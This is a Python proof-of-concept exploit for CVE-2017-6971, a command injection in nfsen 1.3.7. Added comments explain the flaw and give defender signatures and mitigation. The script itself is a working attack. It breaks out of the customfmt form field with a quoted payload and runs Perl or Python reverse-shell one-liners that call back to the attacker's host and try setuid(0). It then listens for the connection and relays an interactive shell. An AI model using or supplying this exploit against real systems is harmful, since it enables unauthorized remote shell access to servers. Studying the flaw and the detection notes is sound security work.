# Proof-of-concept for CVE-2017-6971, an OS command injection in nfsen 1.3.7.
#
# How it works, as far as this file shows: the `customfmt` field of the
# "process" form on nfsen.php?tab=2 is wrapped by the server in a single-quoted
# shell string, so a value of the form `';<cmd>; '#` breaks out of the quotes,
# runs <cmd>, and comments out the remainder of the server's command line.
# The <cmd> used here is a reverse shell that connects back to LHOST:LPORT.
# Both payload variants call setuid(0)/setgid(0), i.e. the injected command is
# expected to run with enough privilege to become root -- not verifiable from
# this script alone.
#
# Defender notes (grounded in the request this script sends):
#  - request-side signature: a POST to nfsen.php?tab=2 whose `customfmt`
#    parameter contains shell metacharacters (quote, `;`, `#`, "perl -e",
#    "python -c"); legitimate custom output formats do not need these.
#  - host-side signature: perl or python spawned under the web-server account
#    opening an outbound TCP connection, followed by /bin/sh -i.
#  - mitigation: update nfsen past 1.3.7 and make sure the nfsen frontend is
#    not exposed to untrusted networks.
#
# This is a Python 2 script (raw_input, str sockets); the __future__ import
# only makes print() behave consistently.
from __future__ import print_function
# remove above import if on python3
import requests
import socket
import base64  # imported but not used anywhere below
from time import sleep
from sys import argv
# Exploit for CVE-2017-6971 command injection in nfsen 1.3.7
# Tested on Ubuntu, probably works on everything
# Vulnerability discovered by Paul Taylor/Foregenix Ltd
# Usage: python exploit.py <local ip> <local port> <target ip> <path>
if len(argv) < 5:
    print("Usage: python exploit.py <local ip> <local port> <target ip> <path>")
    exit(1)
# local ip, port to receive shell on (LPORT stays a string; it is spliced into
# the payloads as text and converted with int() only for the local bind below)
LHOST=argv[1]
LPORT=argv[2]
# target ip
RHOST=argv[3]
# path to nfsen (e.g. 'nfsen' if located at http://target.com/nfsen/nfsen.php)
PATH=argv[4]
# Plain http, no TLS: the whole exchange, payload included, is visible on the wire.
url = "http://" + RHOST + '/' + PATH + "/nfsen.php?tab=2"
# Source: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
# Python variant of the connect-back shell; LHOST/LPORT are string-concatenated
# into the one-liner, so a malformed LPORT only fails on the target side.
python_command="python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"" + LHOST + "\"," + LPORT + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);os.setuid(0); os.setgid(0); p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
# If this fails, try the python one.
# Perl variant; this is the one actually placed in the payload below.
perl_command = "perl -e 'use Socket;use English; $i=\"" + LHOST + "\";$p=" + LPORT + ";socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");$EUID=0;$GID=0;exec(\"/bin/sh -i\");};'"
# basic command injection
# `';` closes the server-side single-quoted string, `; '#` re-opens a quote so
# the trailing text stays syntactically valid and then comments the rest out.
payload = "';" + perl_command + "; '#"
# may need to change the srcselector to match specific target
# Form fields of the nfsen "process" action; everything except customfmt is a
# benign default needed for the server to reach the vulnerable code path.
data = {
    'srcselector%5B%5D': 'peer1',
    'filter': '',
    'filter_name': 'none',
    'modeselect': '0',
    'listN': '0',
    'topN': '0',
    'statype': '1',
    'output': 'custom ...',
    'customfmt': payload,
    'process': 'process'
}
s = requests.Session()
# these required for initializing session and navigating to details page
# (two GETs: the first establishes the session cookie, the second lands on tab=2
#  -- presumably; the script does not inspect either response)
s.get(url)
s.get(url)
# setup listener
# Bind before the POST so the connect-back has something to reach; no reuse
# option is set, so a quick re-run on the same port may fail with EADDRINUSE.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((LHOST, int(LPORT)))
sock.listen(1)
# send payload
# The injected shell keeps the HTTP request open, so the 0.1 s timeout is
# expected to fire; the bare except swallows that along with every other error
# (connection refused, bad path), so a failed delivery is only noticed when
# accept() below blocks forever.
try:
    s.post(url, data=data, timeout=0.1)
except:
    pass
# get shell
# Blocks until the target connects back; accepts whatever connects, no check
# that the peer is RHOST.
connection, remote_address = sock.accept()
print("Received connection from " + str(remote_address[0]))
# Non-blocking so the drain loop below ends by raising instead of hanging.
connection.setblocking(0)
print(connection.recv(1024), end='')
# Interactive relay: read a line locally, send it, then drain replies until
# recv() either returns "" (peer closed) or raises because no data is ready
# yet (non-blocking socket) -- the bare except ends the drain in that case.
# raw_input is Python 2 only.
while True:
    cmd = raw_input()
    connection.sendall(cmd + '\n')
    sleep(0.1)
    try:
        chunk = None
        while chunk != "":
            chunk = connection.recv(1024)
            print(chunk, end='')
    except:
        pass
# Unreachable in practice: the while True above only exits via an uncaught
# exception (e.g. EOFError from raw_input), which skips these closes.
connection.close()
sock.close()